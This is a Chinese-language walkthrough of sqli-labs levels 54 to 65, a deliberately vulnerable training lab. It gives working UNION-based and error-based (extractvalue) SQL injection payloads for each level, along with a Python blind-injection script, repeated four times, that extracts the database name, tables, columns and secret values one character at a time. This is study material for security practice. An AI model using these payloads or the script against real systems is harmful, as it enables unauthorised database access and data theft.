sqli.labs靶场(54-65关)

54、第五十四关

sqli.labs靶场(54-65关)_第1张图片

提示尝试是十次后数据库就重置,那我们尝试unionsqli.labs靶场(54-65关)_第2张图片

sqli.labs靶场(54-65关)_第3张图片

原来是单引号闭合

id=-1' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

sqli.labs靶场(54-65关)_第4张图片

数据库:challenges,表名是:4c7k78qe8t,就一个表

id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='4c7k78qe8t')--+

sqli.labs靶场(54-65关)_第5张图片

字段为:id,sessid,secret_MWHJ,tryy

id=-1' union select 1,2,(select secret_MWHJ from 4c7k78qe8t)--+

sqli.labs靶场(54-65关)_第6张图片

查出Secret Key:KojCXmD2nIqg6AyFzp5Vi1jq

sqli.labs靶场(54-65关)_第7张图片

将获取的key值放到下面输入框点击提交就完成所有步骤。

55、第五十五关

sqli.labs靶场(54-65关)_第8张图片

这关也可以尝试10次,后表名,字段名,数据随机改变

id=-1' union select 1,2,database()--+

sqli.labs靶场(54-65关)_第9张图片

id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

sqli.labs靶场(54-65关)_第10张图片

id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges')--+

sqli.labs靶场(54-65关)_第11张图片

id=-1' union select 1,2,(select group_concat(secret_YV1N) from  qthriw02yn)--+

sqli.labs靶场(54-65关)_第12张图片

secret_YV1N:f11TD89MthkTPZnwzxOHg4OX

sqli.labs靶场(54-65关)_第13张图片

56、第五十六关

sqli.labs靶场(54-65关)_第14张图片

这关可以尝试14次后才重置表数据

id=-1') union select 1,2,3--+尝试出单引号加括号闭合

sqli.labs靶场(54-65关)_第15张图片

id=-1') union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

sqli.labs靶场(54-65关)_第16张图片

id=-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='wcqh1ndqln')--+

sqli.labs靶场(54-65关)_第17张图片

id=-1') union select 1,2,(select secret_TCFR from wcqh1ndqln)--+

sqli.labs靶场(54-65关)_第18张图片

secret key:cityELb2pMtzbUtJLNTMGnHj

sqli.labs靶场(54-65关)_第19张图片

sqli.labs靶场(54-65关)_第20张图片

57、第五十七关

sqli.labs靶场(54-65关)_第21张图片

sqli.labs靶场(54-65关)_第22张图片

尝试出双引号闭合

id=-1" union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

sqli.labs靶场(54-65关)_第23张图片

id=-1" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='dtxwciipgl')--+

sqli.labs靶场(54-65关)_第24张图片

然后查出secret key:qZFAb0BLbaFXnzxh6kjKOYkK

id=-1" union select 1,2,(select group_concat(secret_KB70) from dtxwciipgl)--+

sqli.labs靶场(54-65关)_第25张图片

sqli.labs靶场(54-65关)_第26张图片

58、第五十八关

sqli.labs靶场(54-65关)_第27张图片

这关只能试五次

sqli.labs靶场(54-65关)_第28张图片

有报错,可以尝试报错注入

id=-1' and extractvalue(1,concat(0x7e,database()))--+

sqli.labs靶场(54-65关)_第29张图片

id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

sqli.labs靶场(54-65关)_第30张图片

id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='4l6g2539j4')))--+

sqli.labs靶场(54-65关)_第31张图片

id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_0FM9) from 4l6g2539j4)))--+

sqli.labs靶场(54-65关)_第32张图片

secret key:cHu2PRJ1aEZ7uZ8OVcFx1x80

sqli.labs靶场(54-65关)_第33张图片

sqli.labs靶场(54-65关)_第34张图片

59、第五十九关

根据经验尝试双引号,结果不对,是数值型

sqli.labs靶场(54-65关)_第35张图片

id=1 and extractvalue(1,concat(0x7e,database()))--+

sqli.labs靶场(54-65关)_第36张图片

id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

sqli.labs靶场(54-65关)_第37张图片

id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='egnu8zwkpl')))--+

sqli.labs靶场(54-65关)_第38张图片

接下来根据egnu8zwkpl表查secret_6QHK:9DwDyopuZPFpopuiXwgBLtmA然后提交即可

sqli.labs靶场(54-65关)_第39张图片

sqli.labs靶场(54-65关)_第40张图片

60、第六十关

?id=1"根据报错看出后面还有个括号,应该是双引号加括号闭合

sqli.labs靶场(54-65关)_第41张图片

id=1") and extractvalue(1,concat(0x7e,database()))--+
sqli.labs靶场(54-65关)_第42张图片

id=1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

sqli.labs靶场(54-65关)_第43张图片

id=1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='uz68fmjku1')))--+

sqli.labs靶场(54-65关)_第44张图片

secret key:PwGGU5F3ssSpFEMqDUGeNxL6

sqli.labs靶场(54-65关)_第45张图片

sqli.labs靶场(54-65关)_第46张图片

61、第六十一关

sqli.labs靶场(54-65关)_第47张图片

有报错,感觉是双引号加双括号闭合,还是报错注入尝试

id=1')) and extractvalue(1,concat(0x7e,database()))--+

id=1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

sqli.labs靶场(54-65关)_第48张图片

id=1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='7cqx2e789u')))--+

sqli.labs靶场(54-65关)_第49张图片

id=1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_VHAS) from o8qdqu14j4)))--+

sqli.labs靶场(54-65关)_第50张图片

sqli.labs靶场(54-65关)_第51张图片

62、第六十二关

sqli.labs靶场(54-65关)_第52张图片

这关没有报错信息,无法用报错注入

id=1')--+尝试出是单引号加括号注入

sqli.labs靶场(54-65关)_第53张图片

sqli.labs靶场(54-65关)_第54张图片

sqli.labs靶场(54-65关)_第55张图片

看来得用盲注,上脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-62/?id=1') "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(54-65关)_第56张图片跑出secret key:xhsby2cnal7av3nvaumrzhzf

sqli.labs靶场(54-65关)_第57张图片

sqli.labs靶场(54-65关)_第58张图片

63、第六十三关

sqli.labs靶场(54-65关)_第59张图片

单引号闭合,没有报错信息,还是盲注

还是用脚本方便

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-63/?id=1' "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(54-65关)_第60张图片跑出secrect key:yz4ukedoyymuczebysso01ny

提交secret key

sqli.labs靶场(54-65关)_第61张图片

sqli.labs靶场(54-65关)_第62张图片

64、第六十四关

sqli.labs靶场(54-65关)_第63张图片

sqli.labs靶场(54-65关)_第64张图片

经过多次尝试是两个括号闭合,没有报错信息,还是盲注;上脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-64/?id=1)) "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(54-65关)_第65张图片跑出secrect key:hrpd70rpt9uwatrucfsrz23v

提交secret key

sqli.labs靶场(54-65关)_第66张图片

sqli.labs靶场(54-65关)_第67张图片

65、第六十五关

sqli.labs靶场(54-65关)_第68张图片

sqli.labs靶场(54-65关)_第69张图片

sqli.labs靶场(54-65关)_第70张图片

经测试发现是双引号加括号闭合,没有报错信息,还是考盲注,方便的脚本继续跑

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-65/?id=1%22) "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(54-65关)_第71张图片跑出secrect key:nneodmdybdsnggrqwmfwlxe7

提交secret key

sqli.labs靶场(54-65关)_第72张图片

sqli.labs靶场(54-65关)_第73张图片

你可能感兴趣的:(数据库,mysql,sql)